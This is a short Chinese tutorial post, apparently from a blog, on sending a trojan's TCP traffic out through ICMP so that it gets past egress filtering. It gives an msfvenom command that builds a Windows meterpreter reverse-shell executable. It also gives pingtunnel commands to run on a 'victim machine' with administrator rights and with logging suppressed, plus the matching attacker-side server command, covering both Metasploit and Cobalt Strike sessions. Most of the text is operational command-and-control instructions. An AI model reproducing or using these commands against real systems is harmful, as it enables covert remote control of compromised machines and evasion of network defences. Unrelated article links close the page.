隧道技术-tcp封装icmp出网

1.背景:

目标出网限制tcp协议

2.msf木马转发上线

生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe

受害机器管理员权限执行:

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.3.195 -t 192.168.3.195:4444 -tcp 1 -noprint 1 -nolog 1

攻击机器执行:

./pingtunnel -type server

使用msf接受tcp协议木马会话

原理:

木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。

3.cs木马转发上线

cs创建监听器:

使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。

cs服务端执行:./ping -type server

受害机器执行:

pingtunnel.exe -type client -l 127.0.0.1:9999-s csip -t csip:7777 -tcp 1 -noprint 1 -nolog 1、

相关推荐
诗句藏于尽头4 小时前
完成ssl不安全警告
网络协议·安全·ssl
会飞的鱼先生7 小时前
Node.js-http模块
网络协议·http·node.js
Me4神秘11 小时前
电信、移动、联通、广电跨运营商网速慢原因
网络
-qOVOp-11 小时前
408第三季part2 - 计算机网络 - ip分布首部格式与分片
网络协议·tcp/ip·计算机网络
数通Dinner12 小时前
RSTP 拓扑收敛机制
网络·网络协议·tcp/ip·算法·信息与通信
liulilittle13 小时前
SNIProxy 轻量级匿名CDN代理架构与实现
开发语言·网络·c++·网关·架构·cdn·通信
tan77º14 小时前
【Linux网络编程】Socket - UDP
linux·服务器·网络·c++·udp
小白爱电脑14 小时前
光纤的最小弯曲半径是多少?
网络
花落已飘15 小时前
多线程 vs 异步
linux·网络·系统架构
qq_1715388518 小时前
TCP/IP协议精解:IP协议——互联网世界的邮政编码系统
网络·网络协议·tcp/ip